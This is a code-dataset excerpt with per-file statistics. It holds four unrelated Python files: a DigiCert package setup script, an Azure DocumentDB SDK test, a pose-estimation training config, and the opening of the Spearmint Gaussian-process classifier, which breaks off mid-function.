| 34.292683 | 91 | 0.629445 | 339 | 2,812 | 4.967552 | 0.353982 | 0.039192 | 0.035629 | 0.024941 | 0.023753 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007703 | 0.26138 | 2,812 | 81 | 92 | 34.716049 | 0.803081 | 0 | 0 | 0 | 0 | 0 | 0.12256 | 0.039769 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.169231 | null | null | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d9152a0002e3e05bd42184c7b5ca8570672123 | 1,046 | py | Python | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | 2 | 2017-03-03T20:37:29.000Z | 2018-06-01T22:22:15.000Z | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | null | null | null | setup.py | digicert/digicert_express | 292fb4e7f8a39e53c384a79c50a9488c51258f97 | [
"MIT"
] | 2 | 2018-01-26T07:11:42.000Z | 2019-03-06T23:30:39.000Z | from setuptools import setup, find_packages
def readme():
    """Return the contents of README.rst for the package long description."""
    with open('README.rst') as readme_file:
        contents = readme_file.read()
    return contents
# Distribution metadata and installation configuration for digicert-express.
setup(
    name='digicert-express',
    version='1.1dev2',
    description='Express Install for DigiCert, Inc.',
    long_description=readme(),
    url='https://github.com/digicert/digicert_express',
    author='DigiCert, Inc.',
    author_email='support@digicert.com',
    license='MIT',
    zip_safe=False,
    include_package_data=True,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: MIT License',
        'Topic :: Security',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
    ],
    # Ship everything except tests and helper scripts.
    packages=find_packages(exclude=['tests.*', '*.tests.*', '*.tests', 'tests', 'scripts']),
    install_requires=[
        'python-augeas',
        'requests>=2.8.1',
        'ndg-httpsclient',
        'pyasn1',
        'pyOpenSSL',  # prefer OS install but we can try here, too
    ],
)
| 29.885714 | 92 | 0.605163 | 113 | 1,046 | 5.522124 | 0.707965 | 0.048077 | 0.080128 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015075 | 0.239006 | 1,046 | 34 | 93 | 30.764706 | 0.768844 | 0.040153 | 0 | 0.0625 | 0 | 0 | 0.443114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | true | 0 | 0.03125 | 0 | 0.09375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3da2efce64cb5f88a134e97d2a4092ee8ea80bb | 5,777 | py | Python | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt/tests/test_mgmt_documentdb.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import unittest
import azure.mgmt.documentdb
from msrestazure.azure_exceptions import CloudError
from testutils.common_recordingtestcase import record
from tests.mgmt_testcase import HttpStatusCode, AzureMgmtTestCase
import logging
#logging.basicConfig(level=logging.DEBUG)
class MgmtDocDBTest(AzureMgmtTestCase):
def setUp(self):
super(MgmtDocDBTest, self).setUp()
self.client = self.create_mgmt_client(
azure.mgmt.documentdb.DocumentDB
)
# I don't record resource group creation, since it's another package
if not self.is_playback():
self.create_resource_group()
@record
def test_accounts_create(self):
account_name = self.get_resource_name('pydocdbtst')
self.assertFalse(self.client.database_accounts.check_name_exists(account_name))
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
account = async_docdb_create.result()
self.assertIsNotNone(account)
# Rest API issue
# self.assertEqual(account.name, account_name)
def test_accounts_features(self):
account_name = self.get_resource_name('pydocdbtest')
if not self.is_playback():
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
async_docdb_create.wait()
with self.recording():
account = self.client.database_accounts.get(
self.group_name,
account_name
)
self.assertEqual(account.name, account_name)
my_accounts = list(self.client.database_accounts.list_by_resource_group(self.group_name))
self.assertEqual(len(my_accounts), 1)
self.assertEqual(my_accounts[0].name, account_name)
my_accounts = list(self.client.database_accounts.list())
self.assertTrue(len(my_accounts) >= 1)
self.assertTrue(any(db.name == account_name for db in my_accounts))
# I guess we can make this test with no error, need to check with DocDB team
# This is an interesting test anyway, this implies that the serialization works
# and error message is available. Since this method does not return an object
# (i.e. no deserialization to test), this is a complete test.
# We are NOT here to test the RestAPI, but the Swagger file and Python code.
with self.assertRaises(CloudError) as cm:
async_change = self.client.database_accounts.failover_priority_change(
self.group_name,
account_name,
[{
'location_name': self.region,
'failover_priority': 0
}]
)
async_change.wait()
self.assertIn('Failover priorities must be unique', cm.exception.message)
my_keys = self.client.database_accounts.list_keys(
self.group_name,
account_name
)
self.assertIsNotNone(my_keys.primary_master_key)
self.assertIsNotNone(my_keys.secondary_master_key)
self.assertIsNotNone(my_keys.primary_readonly_master_key)
self.assertIsNotNone(my_keys.secondary_readonly_master_key)
my_keys = self.client.database_accounts.list_read_only_keys(
self.group_name,
account_name
)
self.assertIsNotNone(my_keys.primary_readonly_master_key)
self.assertIsNotNone(my_keys.secondary_readonly_master_key)
async_regenerate = self.client.database_accounts.regenerate_key(
self.group_name,
account_name,
"primary"
)
async_regenerate.wait()
def test_accounts_delete(self):
account_name = self.get_resource_name('pydocumentdbtst')
if not self.is_playback():
async_docdb_create = self.client.database_accounts.create_or_update(
self.group_name,
account_name,
{
'location': self.region,
'locations': [{
'location_name': self.region
}]
}
)
async_docdb_create.wait()
with self.recording():
# Current implementation of msrestazure does not support 404 as a end of LRO delete
# https://github.com/Azure/msrestazure-for-python/issues/7
async_delete = self.client.database_accounts.delete(self.group_name, account_name)
try:
async_delete.wait()
except CloudError as err:
if err.response.status_code != 404:
raise
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 37.512987 | 101 | 0.570885 | 581 | 5,777 | 5.435456 | 0.313253 | 0.066181 | 0.061748 | 0.098797 | 0.427169 | 0.394554 | 0.355288 | 0.286574 | 0.286574 | 0.286574 | 0 | 0.003047 | 0.318331 | 5,777 | 153 | 102 | 37.75817 | 0.798629 | 0.183313 | 0 | 0.390909 | 0 | 0 | 0.043636 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0 | null | null | 0 | 0.054545 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3da88558c778364e49a959d5f0d8f942db1cc43 | 3,758 | py | Python | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | config.py | somritabanerjee/speedplusbaseline | 5913c611d8c182ad8070abcf5f1baffc554dfd90 | [
"MIT"
] | null | null | null | import argparse
PROJROOTDIR = {'mac': '/Users/taehapark/SLAB/speedplusbaseline',
'linux': '/home/somrita/Documents/Satellite_Pose_Estimation/speedplusbaseline'}
DATAROOTDIR = {'mac': '/Users/taehapark/SLAB/speedplus/data/datasets',
'linux': '/home/somrita/Documents/Satellite_Pose_Estimation/dataset'}
parser = argparse.ArgumentParser('Configurations for SPEED+ Baseline Study')
# ------------------------------------------------------------------------------------------
# Basic directories and names
parser.add_argument('--seed', type=int, default=2021)
parser.add_argument('--projroot', type=str, default=PROJROOTDIR['linux'])
parser.add_argument('--dataroot', type=str, default=DATAROOTDIR['linux'])
parser.add_argument('--dataname', type=str, default='speedplus')
parser.add_argument('--savedir', type=str, default='checkpoints/synthetic/krn')
parser.add_argument('--resultfn', type=str, default='')
parser.add_argument('--logdir', type=str, default='log/synthetic/krn')
parser.add_argument('--pretrained', type=str, default='')
# ------------------------------------------------------------------------------------------
# Model config.
parser.add_argument('--model_name', type=str, default='krn')
parser.add_argument('--input_shape', nargs='+', type=int, default=(224, 224))
parser.add_argument('--num_keypoints', type=int, default=11) # KRN-specific
parser.add_argument('--num_classes', type=int, default=5000) # SPN-specific
parser.add_argument('--num_neighbors', type=int, default=5) # SPN-specific
parser.add_argument('--keypts_3d_model', type=str, default='src/utils/tangoPoints.mat')
parser.add_argument('--attitude_class', type=str, default='src/utils/attitudeClasses.mat')
# ------------------------------------------------------------------------------------------
# Training config.
parser.add_argument('--start_over', dest='auto_resume', action='store_false', default=True)
parser.add_argument('--randomize_texture', dest='randomize_texture', action='store_true', default=False)
parser.add_argument('--perform_dann', dest='dann', action='store_true', default=False)
parser.add_argument('--texture_alpha', type=float, default=0.5)
parser.add_argument('--texture_ratio', type=float, default=0.5)
parser.add_argument('--use_fp16', dest='fp16', action='store_true', default=False)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--max_epochs', type=int, default=75)
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--test_epoch', type=int, default=-1)
parser.add_argument('--optimizer', type=str, default='rmsprop')
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--weight_decay', type=float, default=5e-5)
parser.add_argument('--lr_decay_alpha', type=float, default=0.96)
parser.add_argument('--lr_decay_step', type=int, default=1)
# ------------------------------------------------------------------------------------------
# Dataset-related inputs
parser.add_argument('--train_domain', type=str, default='synthetic')
parser.add_argument('--test_domain', type=str, default='lightbox')
parser.add_argument('--train_csv', type=str, default='train.csv')
parser.add_argument('--test_csv', type=str, default='lightbox.csv')
# ------------------------------------------------------------------------------------------
# Other miscellaneous settings
parser.add_argument('--gpu_id', type=int, default=0)
parser.add_argument('--no_cuda', dest='use_cuda', action='store_false', default=True)
# End
cfg = parser.parse_args() | 58.71875 | 104 | 0.631453 | 428 | 3,758 | 5.359813 | 0.313084 | 0.145161 | 0.274194 | 0.037053 | 0.268527 | 0.129904 | 0.129904 | 0.088056 | 0 | 0 | 0 | 0.013235 | 0.095263 | 3,758 | 64 | 105 | 58.71875 | 0.661471 | 0.161788 | 0 | 0 | 0 | 0 | 0.308992 | 0.091518 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3df3020e02d0033dd7ab9554f7528acd2742527 | 21,764 | py | Python | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | spearmint/models/gp_classifier.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | null | null | null | # -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: otd@harvard.edu
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import copy
import sys, logging
import numpy as np
import numpy.random as npr
import scipy.linalg as spla
import scipy.optimize as spo
import scipy.io as sio
import scipy.stats as sps
try:
import scipy.weave as weave
except ImportError:
import weave
from .gp import GP
from ..utils.param import Param as Hyperparameter
from ..kernels import Matern52, Noise, Scale, SumKernel, TransformKernel
from ..sampling.slice_sampler import SliceSampler
from ..sampling.whitened_prior_slice_sampler import WhitenedPriorSliceSampler
from ..sampling.elliptical_slice_sampler import EllipticalSliceSampler
from ..utils import priors
from ..transformations import BetaWarp, Transformer
# Name the logger after the entry-point script when one exists; fall back
# to the root logger otherwise (e.g. in an interactive session).
try:
    module = sys.modules['__main__'].__file__
    log = logging.getLogger(module)
# Narrowed from a bare `except:` which also swallowed KeyboardInterrupt /
# SystemExit; only these two can be raised by the lookup above.
except (KeyError, AttributeError):
    log = logging.getLogger()
    print('Not running from main.')
class GPClassifier(GP):
    """Gaussian process classifier with MCMC-sampled hyperparameters.

    A GP prior is placed over latent function values, which are squashed
    through a sigmoid (probit or logistic) to give a binomial likelihood
    over the observed counts; in the noiseless case a step function is
    used instead.  Latent values are sampled with elliptical slice
    sampling, kernel/mean hyperparameters with (whitened prior) slice
    sampling.
    """

    def __init__(self, num_dims, **options):
        # Observed counts; populated by fit().
        self.counts = None
        log.debug('GP Classifier initialized with options: %s' % (options))
        # Thinning factor for the elliptical slice sampler over latents.
        self.ess_thinning = int(options.get("ess-thinning", 10))
        self._set_likelihood(options)
        self.prior_whitening = options.get('prior-whitening', True)

        sigmoid = options.get("sigmoid", "probit")
        if not self.noiseless:
            if sigmoid == "probit":
                self.sigmoid = sps.norm.cdf
                self.sigmoid_derivative = sps.norm.pdf  # not used
                self.sigmoid_inverse = sps.norm.ppf
            elif sigmoid == "logistic":
                self.sigmoid = sps.logistic.cdf
                self.sigmoid_derivative = sps.logistic.pdf
                self.sigmoid_inverse = sps.logistic.ppf
            else:
                raise Exception("Only probit and logistic sigmoids are supported")
        else:
            # If no noise we use the step function and ignore the "sigmoid" argument.
            # (This is the step function likelihood)
            # assert options['likelihood'] == 'STEP'
            self.sigmoid = lambda x: np.greater_equal(x, 0)
            self.sigmoid_derivative = lambda x: 0.
            self.sigmoid_inverse = lambda x: 0.

        # The constraint is that p=s(f) > 1-epsilon
        # where s if the sigmoid and f is the latent function value, and p is the binomial probability
        # This is only in more complicated situations. The main situation where this is used
        # we want f>0. This is equivalent to epsilon=0.5 for the sigmoids we use
        # The point is: do not set epsilon unless you know what you are doing!
        # (and do not confuse it with delta, the min constraint confidence)
        self._one_minus_epsilon = 1.0 - float(options.get("epsilon", 0.5))

        # BUGFIX: this was previously `self.latent_values_list = []`, but
        # that un-underscored attribute is never read anywhere; every other
        # method uses `self._latent_values_list` (see _reset, fit,
        # set_state), so initialize the attribute that is actually used.
        self._latent_values_list = []

        super(GPClassifier, self).__init__(num_dims, **options)

    def _set_likelihood(self, options):
        """Parse the 'likelihood' option into self.likelihood/self.noiseless."""
        self.likelihood = options.get('likelihood', 'binomial').lower()

        if self.likelihood.lower() == "binomial":
            self.noiseless = False
        elif self.likelihood.lower() == "step":
            self.noiseless = True
        else:
            raise Exception("GP classifier only supports step or binomial likelihood, not %s" % (options['likelihood']))

    def _reset(self):
        """Reset sampler state and re-initialize the latent values."""
        super(GPClassifier, self)._reset()

        # Reset the latent values.  When counts are available, center the
        # initial latents on them (maps counts {0,1} to {-0.5, +0.5}).
        if self.counts is not None:
            initial_latent_vals = self.counts - 0.5
        else:
            initial_latent_vals = np.zeros(0)
        self.latent_values.initial_value = initial_latent_vals
        self.latent_values.reset_value()

        self._latent_values_list = []

    def _set_latent_values_from_dict(self, latent_values_dict):
        """Load latent values keyed by input-hash; default new inputs.

        Pre-existing inputs get their stored latent value back; inputs not
        present in the dict fall back to counts - 0.5.
        """
        # Read in the latent values. For pre-existing data, just load them in
        # For new data, set them to a default.
        default_latent_values = self.counts - 0.5

        latent_values = np.zeros(self._inputs.shape[0])
        for i in xrange(self._inputs.shape[0]):
            # Keys are hashes of the raw input bytes; see to_dict().
            key = str(hash(self._inputs[i].tostring()))
            if key in latent_values_dict:
                latent_values[i] = latent_values_dict[key]
            else:
                latent_values[i] = default_latent_values[i]

        self.latent_values.value = latent_values

    def _burn_samples(self, num_samples):
        """Advance the chain num_samples steps, discarding the samples."""
        for i in xrange(num_samples):
            # Hyperparameters first, then latent values given hypers.
            for sampler in self._samplers:
                sampler.sample(self)

            self.latent_values_sampler.sample(self)
            self.chain_length += 1

    def _collect_samples(self, num_samples):
        """Advance the chain num_samples steps, recording each state.

        Returns (hypers_list, latent_values_list) of per-step dicts.
        """
        hypers_list = []
        latent_values_list = []
        for i in xrange(num_samples):
            for sampler in self._samplers:
                sampler.sample(self)

            self.latent_values_sampler.sample(self)

            current_dict = self.to_dict()
            hypers_list.append(current_dict['hypers'])
            latent_values_list.append(current_dict['latent values'])
            self.chain_length += 1

        return hypers_list, latent_values_list

    def _build(self):
        """Construct the kernel, mean, latent values and their samplers."""
        self.params = {}
        self.latent_values = None

        # Build the transformer
        beta_warp = BetaWarp(self.num_dims)
        beta_alpha, beta_beta = beta_warp.hypers
        self.params['beta_alpha'] = beta_alpha
        self.params['beta_beta'] = beta_beta

        transformer = Transformer(self.num_dims)
        transformer.add_layer(beta_warp)

        # Build the component kernels
        input_kernel = Matern52(self.num_dims)
        ls = input_kernel.hypers
        self.params['ls'] = ls

        # Now apply the transformation.
        transform_kernel = TransformKernel(input_kernel, transformer)

        # Add some perturbation for stability
        stability_noise = Noise(self.num_dims)

        # Finally make a noisy version if necessary
        # In a classifier GP the notion of "noise" is really just the scale.
        if self.noiseless:
            self._kernel = SumKernel(transform_kernel, stability_noise)
        else:
            scaled_kernel = Scale(transform_kernel)
            self._kernel = SumKernel(scaled_kernel, stability_noise)
            amp2 = scaled_kernel.hypers
            self.params['amp2'] = amp2

        # Build the mean function (just a constant mean for now)
        self.mean = Hyperparameter(
            initial_value = 0.0,
            prior         = priors.Gaussian(0.0,1.0),
            name          = 'mean'
        )
        self.params['mean'] = self.mean

        # Buld the latent values. Empty for now until the GP gets data.
        self.latent_values = Hyperparameter(
            initial_value = np.array([]),
            name          = 'latent values'
        )

        # Build the samplers
        to_sample = [self.mean] if self.noiseless else [self.mean, amp2]
        self._samplers.append(SliceSampler(*to_sample, compwise=False, thinning=self.thinning))
        self._samplers.append(WhitenedPriorSliceSampler(ls, beta_alpha, beta_beta, compwise=True, thinning=self.thinning))
        self.latent_values_sampler = EllipticalSliceSampler(self.latent_values, thinning=self.ess_thinning)

    @property
    def values(self):
        """Latent values, with fantasy values appended when pending exist."""
        if self.pending is None or len(self._fantasy_values_list) < self.num_states:
            return self.observed_values

        if self.num_fantasies == 1:
            return np.append(self.latent_values.value, self._fantasy_values_list[self.state].flatten(), axis=0)
        else:
            # Tile the observed latents across fantasy columns first.
            return np.append(np.tile(self.latent_values.value[:,None], (1,self.num_fantasies)), self._fantasy_values_list[self.state], axis=0)

    @property
    def observed_values(self):
        """Latent values for the observed data only (empty before fit)."""
        if self.latent_values is not None:
            return self.latent_values.value
        else:
            return np.array([])

    def set_state(self, state):
        """Restore hypers and latent values from MCMC state `state`."""
        self.state = state
        self._set_params_from_dict(self._hypers_list[state])
        self._set_latent_values_from_dict(self._latent_values_list[state])

    def pi(self, pred, compute_grad=False):
        """Probability of improvement with the sigmoid-derived threshold."""
        return super(GPClassifier, self).pi( pred, compute_grad=compute_grad,
            C=self.sigmoid_inverse(self._one_minus_epsilon) )

    def fit(self, inputs, counts, pending=None, hypers=None, reburn=False, fit_hypers=True):
        """Fit the classifier GP to (inputs, counts) and return its state dict.

        When fit_hypers is False, the current (or provided) hypers are used
        as the single MCMC state instead of running the chain.
        """
        # Set the data for the GP
        self._inputs = inputs
        self.counts  = counts

        # Reset the GP
        self._reset()

        # Initialize the GP with hypers if provided
        if hypers:
            self.from_dict(hypers)

        if fit_hypers:
            # Burn samples (if needed)
            num_samples = self.burnin if reburn or self.chain_length < self.burnin else 0
            self._burn_samples(num_samples)

            # Now collect some samples
            self._hypers_list, self._latent_values_list = self._collect_samples(self.mcmc_iters)

            # Now we have more states
            self.num_states = self.mcmc_iters
        elif not self._hypers_list:
            # Just use the current hypers as the only state
            current_dict             = self.to_dict()
            self._hypers_list        = [current_dict['hypers']]
            self._latent_values_list = [current_dict['latent values']]
            self.num_states          = 1

        # Set pending data and generate corresponding fantasies
        if pending is not None:
            self.pending              = pending
            self._fantasy_values_list = self._collect_fantasies(pending)

        # Get caching ready
        if self.caching:
            self._prepare_cache()

        # Set the hypers to the final state of the chain
        self.set_state(len(self._hypers_list)-1)

        return self.to_dict()

    def log_binomial_likelihood(self, y=None):
        """Log likelihood of the counts given latent values y.

        Defaults to the current latent values.  NOTE(review): `neg = 1 - pos`
        assumes the counts are binary (Bernoulli trials) — confirm.
        """
        # If no data, don't do anything
        if not self.has_data:
            return 0.0

        if y is None:
            y = self.latent_values.value

        p = self.sigmoid(y)

        # Note on the below: the obvious implementation would be
        # return np.sum( pos*np.log(p) + neg*np.log(1-p) )
        # The problem is, if pos = 0, and p=0, we will get a 0*-Inf = nan
        # This messes things up. So we use the safer implementation below that ignores
        # the term entirely if the counts are 0.
        pos = self.counts  # positive counts
